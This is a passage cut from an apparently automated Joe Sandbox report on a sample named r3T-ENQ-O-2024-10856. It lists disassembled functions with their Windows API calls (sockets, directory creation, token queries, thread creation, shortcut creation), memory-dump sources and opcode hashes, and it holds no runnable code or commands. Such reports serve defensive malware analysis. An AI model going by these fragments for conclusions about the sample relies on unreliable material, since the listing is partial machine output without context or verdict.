                            • GetLastError.KERNEL32 ref: 000C6DC5
                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 000C6DD9
                            • _wcsrchr.LIBCMT ref: 000C6DFB
                              • Part of subcall function 000C6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 000C6E31
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                            • String ID:
                            • API String ID: 3633006590-0
                            • Opcode ID: 8bb50645f774c73f176ff2f1fda0db434c1d0083070b6a89179d927c23e67d3d
                            • Instruction ID: 12f2f6c4ca9b2ac8184370f4f78a15f8a27e33bce2c6d1038f7a45c4ac6aa557
                            • Opcode Fuzzy Hash: 8bb50645f774c73f176ff2f1fda0db434c1d0083070b6a89179d927c23e67d3d
                            • Instruction Fuzzy Hash: 92219075A013189ADB7067B4EC5AFEE33AC9F02710F20055AE561C7092EF62CE849A54
                            Function 000D9122 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000DACD3: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 000DACF5
                            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 000D9160
                            • WSAGetLastError.WSOCK32(00000000), ref: 000D916F
                            • connect.WSOCK32(00000000,?,00000010), ref: 000D918B
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ErrorLastconnectinet_addrsocket
                            • String ID:
                            • API String ID: 3701255441-0
                            • Opcode ID: af7600d2654df70082205605f1087de9fef1a57cbce63fb4414769d874728ef2
                            • Instruction ID: f08b506004fe0a2341bca7a63a3f73beb928d5477587fffb87241f2bf6227631
                            • Opcode Fuzzy Hash: af7600d2654df70082205605f1087de9fef1a57cbce63fb4414769d874728ef2
                            • Instruction Fuzzy Hash: 51219335300211AFDB00BF68DC89FAE77E9EF49724F04855AF9569B392DAB0EC418761
                            Function 000D89AD Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                            Download Yara Rule
                            APIs
                            • IsWindow.USER32(00000000), ref: 000D89CE
                            • GetForegroundWindow.USER32 ref: 000D89E5
                            • GetDC.USER32(00000000), ref: 000D8A21
                            • GetPixel.GDI32(00000000,?,00000003), ref: 000D8A2D
                            • ReleaseDC.USER32(00000000,00000003), ref: 000D8A68
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Window$ForegroundPixelRelease
                            • String ID:
                            • API String ID: 4156661090-0
                            • Opcode ID: c6e5f2c54ac4cb5a72a741a97bc5292535141ddd526d693948bd477ff856b14a
                            • Instruction ID: b009183451ed3e4bd43376de3c51322baa1d6c99420a53032ec02c732f804f46
                            • Opcode Fuzzy Hash: c6e5f2c54ac4cb5a72a741a97bc5292535141ddd526d693948bd477ff856b14a
                            • Instruction Fuzzy Hash: 5E218175A00204AFDB00EFA5DC99AAEBBF5EF48311F058479F98997752CB70AD40CB60
                            Function 0009B58B Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                            Download Yara Rule
                            APIs
                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0009B5EB
                            • SelectObject.GDI32(?,00000000), ref: 0009B5FA
                            • BeginPath.GDI32(?), ref: 0009B611
                            • SelectObject.GDI32(?,00000000), ref: 0009B63B
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ObjectSelect$BeginCreatePath
                            • String ID:
                            • API String ID: 3225163088-0
                            • Opcode ID: b75f5dea0755512556e18c5062e918d5898c4e82b69395f574444d46e9fe2283
                            • Instruction ID: 409897af01e952ce59e2649495db089f9a23f929f19022c179fe5d8a923bc337
                            • Opcode Fuzzy Hash: b75f5dea0755512556e18c5062e918d5898c4e82b69395f574444d46e9fe2283
                            • Instruction Fuzzy Hash: A4218B7490030AFBDF209F59FE487A97BE9FB12325F14412AF554925B0D3B498D2EB50
                            Function 000A2E57 Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                            Download Yara Rule
                            APIs
                            • __calloc_crt.LIBCMT ref: 000A2E81
                            • CreateThread.KERNEL32(?,?,000A2FB7,00000000,?,?), ref: 000A2EC5
                            • GetLastError.KERNEL32 ref: 000A2ECF
                            • _free.LIBCMT ref: 000A2ED8
                            • __dosmaperr.LIBCMT ref: 000A2EE3
                              • Part of subcall function 000A889E: __getptd_noexit.LIBCMT ref: 000A889E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                            • String ID:
                            • API String ID: 2664167353-0
                            • Opcode ID: 8ac5a750ad80b02041320b6c79d00444f2661761f39f548e52a0502dc18d738b
                            • Instruction ID: eb619b762a0f1fc937bff276bb4582082e9747817e710044a894c289f94057d3
                            • Opcode Fuzzy Hash: 8ac5a750ad80b02041320b6c79d00444f2661761f39f548e52a0502dc18d738b
                            • Instruction Fuzzy Hash: AE11A132105706AFD720EFE9AC41DAB7BE8EF46760B104539FA5886192EF71C8408761
                            Function 000BB8E7 Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 000BB903
                            • GetLastError.KERNEL32(?,000BB3CB,?,?,?), ref: 000BB90D
                            • GetProcessHeap.KERNEL32(00000008,?,?,000BB3CB,?,?,?), ref: 000BB91C
                            • HeapAlloc.KERNEL32(00000000,?,000BB3CB,?,?,?), ref: 000BB923
                            • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 000BB93A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                            • String ID:
                            • API String ID: 842720411-0
                            • Opcode ID: 0557b1211d94e5d0b344e76b3add0aa2527e6ca726594abe007d03e4a47b2a7b
                            • Instruction ID: c49388e806df7a6232631a90475d90e1afd1f839d5c3e851916f2306e709ba83
                            • Opcode Fuzzy Hash: 0557b1211d94e5d0b344e76b3add0aa2527e6ca726594abe007d03e4a47b2a7b
                            • Instruction Fuzzy Hash: CC011D71201204BFDB215FA5EC88DAB7BADEF8A764B100429F585C3250DBB19C81DA60
                            Function 000C8355 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                            Download Yara Rule
                            APIs
                            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 000C8371
                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 000C837F
                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 000C8387
                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 000C8391
                            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 000C83CD
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: PerformanceQuery$CounterSleep$Frequency
                            • String ID:
                            • API String ID: 2833360925-0
                            • Opcode ID: 38c4f6f3c4d9829ebd12868d4efc6ea9909329baf7bb481b277ab211149815f4
                            • Instruction ID: e2440fa94a4718d2d2957d9a67a2cf8ff9dec1fcc90acb7a1d91f1fdd07c0f9f
                            • Opcode Fuzzy Hash: 38c4f6f3c4d9829ebd12868d4efc6ea9909329baf7bb481b277ab211149815f4
                            • Instruction Fuzzy Hash: 4B012D35D00629DBCF00AFE8ED48AEEBB78FB08B11F01515AE541B2550DFB0969087A5
                            Function 000BA857 Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                            Download Yara Rule
                            APIs
                            • CLSIDFromProgID.OLE32 ref: 000BA874
                            • ProgIDFromCLSID.OLE32(?,00000000), ref: 000BA88F
                            • lstrcmpiW.KERNEL32(?,00000000), ref: 000BA89D
                            • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 000BA8AD
                            • CLSIDFromString.OLE32(?,?), ref: 000BA8B9
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: From$Prog$FreeStringTasklstrcmpi
                            • String ID:
                            • API String ID: 3897988419-0
                            • Opcode ID: 9ecf3a054bde58ca75530c246e6934ece85767b3cde3cdb733b57927883f0fd9
                            • Instruction ID: fca7d1067636495ae10c1790cea3e66eb5f5c2dd27c248712618da0c6aef1355
                            • Opcode Fuzzy Hash: 9ecf3a054bde58ca75530c246e6934ece85767b3cde3cdb733b57927883f0fd9
                            • Instruction Fuzzy Hash: 49018F76600204AFDB114FA4EC44BAA7BEDEF45361F108026F941D6610EBB1DD818BA1
                            Function 000BB78E Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 000BB7A5
                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 000BB7AF
                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 000BB7BE
                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 000BB7C5
                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 000BB7DB
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: HeapInformationToken$AllocErrorLastProcess
                            • String ID:
                            • API String ID: 44706859-0
                            • Opcode ID: 56d84c90cd2747a890f0327a1099978c51db655e8e9cfbda9a2eaa31b213a61b
                            • Instruction ID: ad24cd15866468b738241bd7d751902496a866b8db3035374217b337f0bf424c
                            • Opcode Fuzzy Hash: 56d84c90cd2747a890f0327a1099978c51db655e8e9cfbda9a2eaa31b213a61b
                            • Instruction Fuzzy Hash: 77F04F712802046FEB101FA5EC89EA73BACFF8A755F104059F985C7150DBB0DC828A60
                            Function 000BB7EF Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 000BB806
                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 000BB810
                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 000BB81F
                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 000BB826
                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 000BB83C
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: HeapInformationToken$AllocErrorLastProcess
                            • String ID:
                            • API String ID: 44706859-0
                            • Opcode ID: 591160279a92b6f63775aadedd6f8d96f315b426c1d64adb4c97161c1adf5b70
                            • Instruction ID: ec68c2eeb0a56e8f1299c28fdf76af13e93d3ce06c0bab7ce3983a038698b3d8
                            • Opcode Fuzzy Hash: 591160279a92b6f63775aadedd6f8d96f315b426c1d64adb4c97161c1adf5b70
                            • Instruction Fuzzy Hash: 6EF04975200205AFEB611FA5FC88EAB3BACFF4A754F000029F985C7250CBB09881CAA0
                            Function 000BFA7B Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetDlgItem.USER32(?,000003E9), ref: 000BFA8F
                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 000BFAA6
                            • MessageBeep.USER32(00000000), ref: 000BFABE
                            • KillTimer.USER32(?,0000040A), ref: 000BFADA
                            • EndDialog.USER32(?,00000001), ref: 000BFAF4
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                            • String ID:
                            • API String ID: 3741023627-0
                            • Opcode ID: 1ebe25e49be8f8deb82403f90f98bb26c95d337a2e0baaa5ed392652fa6102b1
                            • Instruction ID: f0a3f3686af471efc9ae913557950dc06572ff6200b575410610280ec40b27a0
                            • Opcode Fuzzy Hash: 1ebe25e49be8f8deb82403f90f98bb26c95d337a2e0baaa5ed392652fa6102b1
                            • Instruction Fuzzy Hash: DF018670500705ABEB349B50ED4EBE677B8FB00B09F0401A9B587A54E1DBF0A984CB41
                            Function 0009B517 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                            Download Yara Rule
                            APIs
                            • EndPath.GDI32(?), ref: 0009B526
                            • StrokeAndFillPath.GDI32(?,?,000FF583,00000000,?), ref: 0009B542
                            • SelectObject.GDI32(?,00000000), ref: 0009B555
                            • DeleteObject.GDI32 ref: 0009B568
                            • StrokePath.GDI32(?), ref: 0009B583
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Path$ObjectStroke$DeleteFillSelect
                            • String ID:
                            • API String ID: 2625713937-0
                            • Opcode ID: 96d9ca9f631a067e7f9b89d8a5986c5e3f24556498ea1ae28aab8ac8cffb09a9
                            • Instruction ID: d12aa0e2e9109519c68f461bc2a8fff517c0af2c223443fa712214dad12f8438
                            • Opcode Fuzzy Hash: 96d9ca9f631a067e7f9b89d8a5986c5e3f24556498ea1ae28aab8ac8cffb09a9
                            • Instruction Fuzzy Hash: D8F0C43804060AABDB656F65FE087683FE5AB12362F188214F4A9459F4DB7089D6EF50
                            Function 000CFA15 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                            Download Yara Rule
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 000CFAB2
                            • CoCreateInstance.OLE32(0010DA7C,00000000,00000001,0010D8EC,?), ref: 000CFACA
                              • Part of subcall function 0008CAEE: _memmove.LIBCMT ref: 0008CB2F
                            • CoUninitialize.OLE32 ref: 000CFD2D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CreateInitializeInstanceUninitialize_memmove
                            • String ID: .lnk
                            • API String ID: 2683427295-24824748
                            • Opcode ID: 6d8ce6c29b2f10f5b74d1ff8fd648714d9adeb3d7ad5e6c745306d2fe3c77489
                            • Instruction ID: 72ce5d8c73da080bf3e7d1a1e2327268683f388954ed3e986a3d369e37904aef
                            • Opcode Fuzzy Hash: 6d8ce6c29b2f10f5b74d1ff8fd648714d9adeb3d7ad5e6c745306d2fe3c77489
                            • Instruction Fuzzy Hash: 55A11B71504205AFD704EF64CC91EABB7EDBF98704F40892DF19597192EB70EA09CBA2
                            Function 000CEFCD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000C78AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 000C78CB
                            • CoInitialize.OLE32(00000000), ref: 000CF04D
                            • CoCreateInstance.OLE32(0010DA7C,00000000,00000001,0010D8EC,?), ref: 000CF066
                            • CoUninitialize.OLE32 ref: 000CF083
                              • Part of subcall function 000884A6: __swprintf.LIBCMT ref: 000884E5
                              • Part of subcall function 000884A6: __itow.LIBCMT ref: 00088519
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                            • String ID: .lnk
                            • API String ID: 2126378814-24824748
                            • Opcode ID: b3ab24b9d97b16a7bd100ad1d75e04815658b8165a0a1e24229a39cdc6b7cc72
                            • Instruction ID: c5c440f6f340fabff9a999a85cbdf3524506e6a95fb3589e67e78ee003ad6813
                            • Opcode Fuzzy Hash: b3ab24b9d97b16a7bd100ad1d75e04815658b8165a0a1e24229a39cdc6b7cc72
                            • Instruction Fuzzy Hash: CEA126756043029FCB14EF54C884E6EBBE6BF88320F148559F8959B3A2CB31ED45CB92
                            Function 0009DA5A Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 162COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID:
                            • String ID: #$+
                            • API String ID: 0-2552117581
                            • Opcode ID: ecee6a69afc0b13fd0725bf9c1fd23e39c41516af00795ae9a828f1d77c2fd42
                            • Instruction ID: 8636d6bed3b7b7606610d10bb63b2652e1b768d2e52a5c4a6a99b0a97a770000
                            • Opcode Fuzzy Hash: ecee6a69afc0b13fd0725bf9c1fd23e39c41516af00795ae9a828f1d77c2fd42
                            • Instruction Fuzzy Hash: 34510E3550425ACFDF65EF68C880AFE7BE0AF26320F544066FE819B291D7349D42EB20
                            Function 000C503C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                            Download Yara Rule
                            APIs
                            • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0011DC40,?,0000000F,0000000C,00000016,0011DC40,?), ref: 000C507B
                              • Part of subcall function 000884A6: __swprintf.LIBCMT ref: 000884E5
                              • Part of subcall function 000884A6: __itow.LIBCMT ref: 00088519
                              • Part of subcall function 0008B8A7: _memmove.LIBCMT ref: 0008B8FB
                            • CharUpperBuffW.USER32(?,?,00000000,?), ref: 000C50FB
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: BuffCharUpper$__itow__swprintf_memmove
                            • String ID: REMOVE$THIS
                            • API String ID: 2528338962-776492005
                            • Opcode ID: eb3371c1430ced7903b068a53fe69851a9f2e346da626eec0622726526e46345
                            • Instruction ID: 17cf753494b49fb3fa8b8a9cb73abb2ce353647ca635b206cae9d7d618465fb1
                            • Opcode Fuzzy Hash: eb3371c1430ced7903b068a53fe69851a9f2e346da626eec0622726526e46345
                            • Instruction Fuzzy Hash: F8417079A006199FCF15EF54CC85FAEB7F5BF48304F088069E856AB292DB34AD81CB50
                            Function 000BCF7F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                            Download Yara Rule
                            APIs
